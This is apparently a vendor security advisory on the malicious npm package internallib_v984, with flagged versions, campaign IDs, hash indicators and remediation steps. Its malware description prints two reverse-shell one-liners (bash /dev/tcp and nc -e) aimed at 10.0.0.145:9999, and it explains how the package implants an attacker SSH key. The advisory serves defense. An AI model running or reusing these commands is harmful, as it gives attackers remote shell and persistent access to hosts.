Which versions of internallib_v984 are malicious?

The following npm versions of internallib_v984 are flagged malicious: 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 99.0.0. Treat any of these as compromised.

How do I remediate internallib_v984 if I installed it?

Remove internallib_v984 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is internallib_v984 part of a known attack campaign?

Yes — internallib_v984 is associated with the IN-MAL-2026-005784, IN-MAL-2026-005786, IN-MAL-2026-005783, IN-MAL-2026-005785, IN-MAL-2026-005782, IN-MAL-2026-005787 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect internallib_v984 in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking internallib_v984 and packages like it before any post-install script runs.

Malicious package

internallib_v984npm

Malicious code in internallib_v984 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5695

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall internallib_v984

What this malware does

Package exports a single command() function that, when invoked, performs three coordinated attacks against the host: (1) appends a hardcoded attacker-controlled SSH public key (tr0n@DESKTOP-GVIA2J0) to authorized_keys under /root/.ssh, /home/gitlab-runner/.ssh, and /home/internal/.ssh, granting persistent remote root and CI-runner login; (2) reads /root/root.txt, /home/internal/user.txt, and /home/gitlab-runner/user.txt and writes their contents to stdout; (3) opens a reverse shell to 10.0.0.145:9999 using three redundant methods (bash -i >& /dev/tcp/10.0.0.145/9999 0>&1, nc -e /bin/bash 10.0.0.145 9999, and a Node net.Socket connecting to the same address with spawn('/bin/bash')). The package has no README, no author or repository metadata, and the name internallib_v984 is shaped to win a dependency-confusion resolution against an internal library of that name. There is no legitimate functionality — the entire module is offensive tooling. Any consumer that resolves this package from the public registry and calls its export is fully compromised: persistent SSH access via the implanted key, live interactive C2 via the reverse shell, and exfiltration of CTF-style flag files. The hardcoded RFC1918 destination (10.0.0.145) further indicates the attacker expects to land inside a corporate or lab network where that address is routable.

Malicious versions

6 flagged

1.0.11.0.21.0.31.0.41.0.599.0.0

Indicators of compromise (SHA-256)

093b5433386d2468e78e9896d1c8566d06f6f3ac6544dc90d4e6fdb9d967c6ed

3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8

5910f34f83567d2d5f48fc2c3966537cc4b313570d77696c743d116fc2b54f05

7e1e3c1f3e148527111254b20a9cbe8d1a6f5d6abaadc0e45c35ca4b2febc431

af6c7b94d4d81140d1e4d37ddf38ef298287d7e118ac0849311254c88ebb8916

b62a6df4be478a792579b9f9741361e56e14fdd0d96f97305bf1fd4a0f076a06

Frequently asked questions

No. internallib_v984 on npm has been identified as a malicious package (versions 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 99.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005784IN-MAL-2026-005786IN-MAL-2026-005783IN-MAL-2026-005785IN-MAL-2026-005782IN-MAL-2026-005787

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection